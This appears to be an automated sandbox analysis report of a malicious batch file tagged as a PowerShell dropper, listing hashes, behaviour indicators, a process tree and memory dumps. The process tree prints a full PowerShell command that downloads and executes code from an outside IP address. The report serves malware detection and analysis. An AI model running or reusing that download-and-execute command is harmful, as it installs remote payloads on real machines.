953b3d8b5ecaced21d0f1cf5c7e116715ef6f3da45ee1788cbd867c4d0508589

Analysis

Target

4b173a78abd9946d4d62ac1747f6b27b.bat
Size

214B
MD5

4169794796eef3d174ede39b9bd8ed3b
SHA1

ee75d44e353e2b6873ebbc0295b3d3cd6466f9bd
SHA256

953b3d8b5ecaced21d0f1cf5c7e116715ef6f3da45ee1788cbd867c4d0508589
SHA512

8abe81aae9f0e9ac9966713c66ee8a762d31889d6d0a763da4912f1f3a207932e6a0ed7ab22d38f3ee6c4e42d7b4d2886fc98c0b408a7c15aff0cf8e3a4ae623

Score

10^/10

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/4b173a78abd9946d4d62ac1747f6b27b

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 636 wrote to memory of 900	636	cmd.exe	67
PID 636 wrote to memory of 900	636	cmd.exe	67
PID 636 wrote to memory of 900	636	cmd.exe	67

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1148	900	WerFault.exe	67

Suspicious use of AdjustPrivilegeToken 3 IoCs

Suspicious behavior: EnumeratesProcesses 13 IoCs

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\4b173a78abd9946d4d62ac1747f6b27b.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:636
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/4b173a78abd9946d4d62ac1747f6b27b');Invoke-REHFNXV;Start-Sleep -s 10000"
  2⤵
  PID:900
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 900 -s 704
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    PID:1148

memory/1148-1-0x0000000004F30000-0x0000000004F31000-memory.dmp

Filesize
4KB

Download
memory/1148-2-0x0000000004F30000-0x0000000004F31000-memory.dmp

Filesize
4KB

Download
memory/1148-10-0x00000000056E0000-0x00000000056E1000-memory.dmp

Filesize
4KB

Download